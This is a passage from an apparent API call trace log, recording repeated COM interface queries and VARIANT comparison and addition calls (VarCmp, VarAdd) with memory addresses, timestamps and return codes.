This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.112] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.112] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.112] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.112] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.112] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.112] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.112] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.112] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c8 | out: ppvObject=0x1842c8*=0x0) returned 0x80004002 [0042.113] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1842c0 | out: ppvObject=0x1842c0*=0x0) returned 0x80004002 [0042.113] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.113] VarCmp (pvarLeft=0x6b7ebd0, pvarRight=0x6b7eb80, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.113] VarCmp (pvarLeft=0x6b7ebd0, pvarRight=0x6b7eb80, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.113] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7eac0, pvarResult=0x6b7eaa8 | out: pvarResult=0x6b7eaa8) returned 0x0 [0042.113] VarAdd (in: pvarLeft=0x6b7ec60, pvarRight=0x6b7ebe8, pvarResult=0x6b7ec48 | out: pvarResult=0x6b7ec48) returned 0x0 [0042.113] VarAdd (in: pvarLeft=0x6b7ec98, pvarRight=0x6b7ec60, pvarResult=0x6b7ec48 | out: pvarResult=0x6b7ec48) returned 0x0 [0042.113] VarCmp (pvarLeft=0x6b7ec98, pvarRight=0x6b7eb50, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.113] VarAdd (in: pvarLeft=0x6b7ea70, pvarRight=0x6b7eaa0, pvarResult=0x6b7ea88 | out: pvarResult=0x6b7ea88) returned 0x0 [0042.114] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7ea58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.114] VarAdd (in: pvarLeft=0x6b7e968, pvarRight=0x6b7e998, pvarResult=0x6b7e980 | out: pvarResult=0x6b7e980) returned 0x0 [0042.114] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e9e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.114] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7ea40, pvarResult=0x6b7ea18 | out: pvarResult=0x6b7ea18) returned 0x0 [0042.114] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e998, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.115] VarAdd (in: pvarLeft=0x6b7e8a8, pvarRight=0x6b7e8d8, pvarResult=0x6b7e8c0 | out: pvarResult=0x6b7e8c0) returned 0x0 [0042.115] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e928, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.115] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e980, pvarResult=0x6b7e958 | out: pvarResult=0x6b7e958) returned 0x0 [0042.115] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e8d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.115] VarAdd (in: pvarLeft=0x6b7e7e8, pvarRight=0x6b7e818, pvarResult=0x6b7e800 | out: pvarResult=0x6b7e800) returned 0x0 [0042.115] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e868, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.115] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e8c0, pvarResult=0x6b7e898 | out: pvarResult=0x6b7e898) returned 0x0 [0042.115] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e818, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.116] VarAdd (in: pvarLeft=0x6b7e728, pvarRight=0x6b7e758, pvarResult=0x6b7e740 | out: pvarResult=0x6b7e740) returned 0x0 [0042.116] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e7a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.116] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e800, pvarResult=0x6b7e7d8 | out: pvarResult=0x6b7e7d8) returned 0x0 [0042.116] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e758, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.116] VarAdd (in: pvarLeft=0x6b7e668, pvarRight=0x6b7e698, pvarResult=0x6b7e680 | out: pvarResult=0x6b7e680) returned 0x0 [0042.116] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e6e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.116] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e740, pvarResult=0x6b7e718 | out: pvarResult=0x6b7e718) returned 0x0 [0042.116] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e698, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.117] VarAdd (in: pvarLeft=0x6b7e5a8, pvarRight=0x6b7e5d8, pvarResult=0x6b7e5c0 | out: pvarResult=0x6b7e5c0) returned 0x0 [0042.117] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e628, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.117] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e680, pvarResult=0x6b7e658 | out: pvarResult=0x6b7e658) returned 0x0 [0042.117] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e5d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.117] VarAdd (in: pvarLeft=0x6b7e4e8, pvarRight=0x6b7e518, pvarResult=0x6b7e500 | out: pvarResult=0x6b7e500) returned 0x0 [0042.117] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e568, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.117] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e5c0, pvarResult=0x6b7e598 | out: pvarResult=0x6b7e598) returned 0x0 [0042.117] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e518, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.118] VarAdd (in: pvarLeft=0x6b7e428, pvarRight=0x6b7e458, pvarResult=0x6b7e440 | out: pvarResult=0x6b7e440) returned 0x0 [0042.118] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e4a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.118] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e500, pvarResult=0x6b7e4d8 | out: pvarResult=0x6b7e4d8) returned 0x0 [0042.118] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e458, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.118] VarAdd (in: pvarLeft=0x6b7e368, pvarRight=0x6b7e398, pvarResult=0x6b7e380 | out: pvarResult=0x6b7e380) returned 0x0 [0042.118] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e3e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.118] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e440, pvarResult=0x6b7e418 | out: pvarResult=0x6b7e418) returned 0x0 [0042.118] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e398, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.119] VarAdd (in: pvarLeft=0x6b7e2a8, pvarRight=0x6b7e2d8, pvarResult=0x6b7e2c0 | out: pvarResult=0x6b7e2c0) returned 0x0 [0042.119] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e328, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.119] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e380, pvarResult=0x6b7e358 | out: pvarResult=0x6b7e358) returned 0x0 [0042.119] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e2d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.119] VarAdd (in: pvarLeft=0x6b7e1e8, pvarRight=0x6b7e218, pvarResult=0x6b7e200 | out: pvarResult=0x6b7e200) returned 0x0 [0042.119] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e268, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.119] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e2c0, pvarResult=0x6b7e298 | out: pvarResult=0x6b7e298) returned 0x0 [0042.119] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e218, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.120] VarAdd (in: pvarLeft=0x6b7e128, pvarRight=0x6b7e158, pvarResult=0x6b7e140 | out: pvarResult=0x6b7e140) returned 0x0 [0042.120] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e1a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.120] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e200, pvarResult=0x6b7e1d8 | out: pvarResult=0x6b7e1d8) returned 0x0 [0042.120] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e158, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.120] VarAdd (in: pvarLeft=0x6b7e068, pvarRight=0x6b7e098, pvarResult=0x6b7e080 | out: pvarResult=0x6b7e080) returned 0x0 [0042.120] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e0e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.120] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e140, pvarResult=0x6b7e118 | out: pvarResult=0x6b7e118) returned 0x0 [0042.120] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7e098, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.121] VarAdd (in: pvarLeft=0x6b7dfa8, pvarRight=0x6b7dfd8, pvarResult=0x6b7dfc0 | out: pvarResult=0x6b7dfc0) returned 0x0 [0042.121] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7e028, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.121] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7e080, pvarResult=0x6b7e058 | out: pvarResult=0x6b7e058) returned 0x0 [0042.121] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7dfd8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.121] VarAdd (in: pvarLeft=0x6b7dee8, pvarRight=0x6b7df18, pvarResult=0x6b7df00 | out: pvarResult=0x6b7df00) returned 0x0 [0042.121] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7df68, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.121] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7dfc0, pvarResult=0x6b7df98 | out: pvarResult=0x6b7df98) returned 0x0 [0042.121] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7df18, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.122] VarAdd (in: pvarLeft=0x6b7de28, pvarRight=0x6b7de58, pvarResult=0x6b7de40 | out: pvarResult=0x6b7de40) returned 0x0 [0042.122] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dea8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.122] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7df00, pvarResult=0x6b7ded8 | out: pvarResult=0x6b7ded8) returned 0x0 [0042.122] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7de58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.122] VarAdd (in: pvarLeft=0x6b7dd68, pvarRight=0x6b7dd98, pvarResult=0x6b7dd80 | out: pvarResult=0x6b7dd80) returned 0x0 [0042.122] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dde8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.122] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7de40, pvarResult=0x6b7de18 | out: pvarResult=0x6b7de18) returned 0x0 [0042.123] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7dd98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.123] VarAdd (in: pvarLeft=0x6b7dca8, pvarRight=0x6b7dcd8, pvarResult=0x6b7dcc0 | out: pvarResult=0x6b7dcc0) returned 0x0 [0042.123] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dd28, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.123] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7dd80, pvarResult=0x6b7dd58 | out: pvarResult=0x6b7dd58) returned 0x0 [0042.123] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7dcd8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.123] VarAdd (in: pvarLeft=0x6b7dbe8, pvarRight=0x6b7dc18, pvarResult=0x6b7dc00 | out: pvarResult=0x6b7dc00) returned 0x0 [0042.123] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dc68, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.123] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7dcc0, pvarResult=0x6b7dc98 | out: pvarResult=0x6b7dc98) returned 0x0 [0042.124] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7dc18, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.124] VarAdd (in: pvarLeft=0x6b7db28, pvarRight=0x6b7db58, pvarResult=0x6b7db40 | out: pvarResult=0x6b7db40) returned 0x0 [0042.124] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dba8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.124] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7dc00, pvarResult=0x6b7dbd8 | out: pvarResult=0x6b7dbd8) returned 0x0 [0042.124] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7db58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.124] VarAdd (in: pvarLeft=0x6b7da68, pvarRight=0x6b7da98, pvarResult=0x6b7da80 | out: pvarResult=0x6b7da80) returned 0x0 [0042.124] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7dae8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.124] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7db40, pvarResult=0x6b7db18 | out: pvarResult=0x6b7db18) returned 0x0 [0042.124] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7da98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.125] VarAdd (in: pvarLeft=0x6b7d9a8, pvarRight=0x6b7d9d8, pvarResult=0x6b7d9c0 | out: pvarResult=0x6b7d9c0) returned 0x0 [0042.125] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7da28, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.125] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7da80, pvarResult=0x6b7da58 | out: pvarResult=0x6b7da58) returned 0x0 [0042.125] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d9d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.125] VarAdd (in: pvarLeft=0x6b7d8e8, pvarRight=0x6b7d918, pvarResult=0x6b7d900 | out: pvarResult=0x6b7d900) returned 0x0 [0042.125] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d968, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.125] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d9c0, pvarResult=0x6b7d998 | out: pvarResult=0x6b7d998) returned 0x0 [0042.125] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d918, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.126] VarAdd (in: pvarLeft=0x6b7d828, pvarRight=0x6b7d858, pvarResult=0x6b7d840 | out: pvarResult=0x6b7d840) returned 0x0 [0042.126] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d8a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.126] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d900, pvarResult=0x6b7d8d8 | out: pvarResult=0x6b7d8d8) returned 0x0 [0042.126] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d858, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.126] VarAdd (in: pvarLeft=0x6b7d768, pvarRight=0x6b7d798, pvarResult=0x6b7d780 | out: pvarResult=0x6b7d780) returned 0x0 [0042.126] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d7e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.126] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d840, pvarResult=0x6b7d818 | out: pvarResult=0x6b7d818) returned 0x0 [0042.126] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d798, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.127] VarAdd (in: pvarLeft=0x6b7d6a8, pvarRight=0x6b7d6d8, pvarResult=0x6b7d6c0 | out: pvarResult=0x6b7d6c0) returned 0x0 [0042.127] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d728, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.127] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d780, pvarResult=0x6b7d758 | out: pvarResult=0x6b7d758) returned 0x0 [0042.127] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d6d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.127] VarAdd (in: pvarLeft=0x6b7d5e8, pvarRight=0x6b7d618, pvarResult=0x6b7d600 | out: pvarResult=0x6b7d600) returned 0x0 [0042.127] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d668, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.127] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d6c0, pvarResult=0x6b7d698 | out: pvarResult=0x6b7d698) returned 0x0 [0042.127] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d618, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.128] VarAdd (in: pvarLeft=0x6b7d528, pvarRight=0x6b7d558, pvarResult=0x6b7d540 | out: pvarResult=0x6b7d540) returned 0x0 [0042.128] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d5a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.128] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d600, pvarResult=0x6b7d5d8 | out: pvarResult=0x6b7d5d8) returned 0x0 [0042.128] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d558, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.128] VarAdd (in: pvarLeft=0x6b7d468, pvarRight=0x6b7d498, pvarResult=0x6b7d480 | out: pvarResult=0x6b7d480) returned 0x0 [0042.128] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d4e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.128] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d540, pvarResult=0x6b7d518 | out: pvarResult=0x6b7d518) returned 0x0 [0042.128] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d498, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.129] VarAdd (in: pvarLeft=0x6b7d3a8, pvarRight=0x6b7d3d8, pvarResult=0x6b7d3c0 | out: pvarResult=0x6b7d3c0) returned 0x0 [0042.129] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d428, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.129] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d480, pvarResult=0x6b7d458 | out: pvarResult=0x6b7d458) returned 0x0 [0042.129] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d3d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.129] VarAdd (in: pvarLeft=0x6b7d2e8, pvarRight=0x6b7d318, pvarResult=0x6b7d300 | out: pvarResult=0x6b7d300) returned 0x0 [0042.129] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d368, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.129] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d3c0, pvarResult=0x6b7d398 | out: pvarResult=0x6b7d398) returned 0x0 [0042.129] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d318, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.130] VarAdd (in: pvarLeft=0x6b7d228, pvarRight=0x6b7d258, pvarResult=0x6b7d240 | out: pvarResult=0x6b7d240) returned 0x0 [0042.130] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d2a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.130] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d300, pvarResult=0x6b7d2d8 | out: pvarResult=0x6b7d2d8) returned 0x0 [0042.130] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d258, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.130] VarAdd (in: pvarLeft=0x6b7d168, pvarRight=0x6b7d198, pvarResult=0x6b7d180 | out: pvarResult=0x6b7d180) returned 0x0 [0042.130] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d1e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.130] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d240, pvarResult=0x6b7d218 | out: pvarResult=0x6b7d218) returned 0x0 [0042.130] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d198, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.131] VarAdd (in: pvarLeft=0x6b7d0a8, pvarRight=0x6b7d0d8, pvarResult=0x6b7d0c0 | out: pvarResult=0x6b7d0c0) returned 0x0 [0042.131] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d128, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.131] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d180, pvarResult=0x6b7d158 | out: pvarResult=0x6b7d158) returned 0x0 [0042.131] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d0d8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.131] VarAdd (in: pvarLeft=0x6b7cfe8, pvarRight=0x6b7d018, pvarResult=0x6b7d000 | out: pvarResult=0x6b7d000) returned 0x0 [0042.131] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7d068, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.131] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d0c0, pvarResult=0x6b7d098 | out: pvarResult=0x6b7d098) returned 0x0 [0042.131] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7d018, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.132] VarAdd (in: pvarLeft=0x6b7cf28, pvarRight=0x6b7cf58, pvarResult=0x6b7cf40 | out: pvarResult=0x6b7cf40) returned 0x0 [0042.132] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cfa8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.132] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7d000, pvarResult=0x6b7cfd8 | out: pvarResult=0x6b7cfd8) returned 0x0 [0042.132] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cf58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.132] VarAdd (in: pvarLeft=0x6b7ce68, pvarRight=0x6b7ce98, pvarResult=0x6b7ce80 | out: pvarResult=0x6b7ce80) returned 0x0 [0042.132] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cee8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.132] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cf40, pvarResult=0x6b7cf18 | out: pvarResult=0x6b7cf18) returned 0x0 [0042.132] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7ce98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.133] VarAdd (in: pvarLeft=0x6b7cda8, pvarRight=0x6b7cdd8, pvarResult=0x6b7cdc0 | out: pvarResult=0x6b7cdc0) returned 0x0 [0042.133] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7ce28, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.133] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7ce80, pvarResult=0x6b7ce58 | out: pvarResult=0x6b7ce58) returned 0x0 [0042.133] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cdd8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.133] VarAdd (in: pvarLeft=0x6b7cce8, pvarRight=0x6b7cd18, pvarResult=0x6b7cd00 | out: pvarResult=0x6b7cd00) returned 0x0 [0042.133] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cd68, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.133] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cdc0, pvarResult=0x6b7cd98 | out: pvarResult=0x6b7cd98) returned 0x0 [0042.133] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cd18, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.134] VarAdd (in: pvarLeft=0x6b7cc28, pvarRight=0x6b7cc58, pvarResult=0x6b7cc40 | out: pvarResult=0x6b7cc40) returned 0x0 [0042.134] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cca8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.134] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cd00, pvarResult=0x6b7ccd8 | out: pvarResult=0x6b7ccd8) returned 0x0 [0042.134] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cc58, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.134] VarAdd (in: pvarLeft=0x6b7cb68, pvarRight=0x6b7cb98, pvarResult=0x6b7cb80 | out: pvarResult=0x6b7cb80) returned 0x0 [0042.134] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cbe8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0042.134] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cc40, pvarResult=0x6b7cc18 | out: pvarResult=0x6b7cc18) returned 0x0 [0042.134] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cb98, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.135] VarAdd (in: pvarLeft=0x6b7caa8, pvarRight=0x6b7cad8, pvarResult=0x6b7cac0 | out: pvarResult=0x6b7cac0) returned 0x0 [0042.135] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7cb28, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.135] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cb80, pvarResult=0x6b7cb58 | out: pvarResult=0x6b7cb58) returned 0x0 [0042.135] VarCmp (pvarLeft=0x6b7ea90, pvarRight=0x6b7cad8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.135] VarAdd (in: pvarLeft=0x6b7c9e8, pvarRight=0x6b7ca18, pvarResult=0x6b7ca00 | out: pvarResult=0x6b7ca00) returned 0x0 [0042.135] VarCmp (pvarLeft=0x6b7eb38, pvarRight=0x6b7ca68, lcid=0x0, dwFlags=0x30001) returned 0x0 [0042.135] VarAdd (in: pvarLeft=0x6b7ea90, pvarRight=0x6b7cac0, pvarResult=0x6b7ca98 | out: 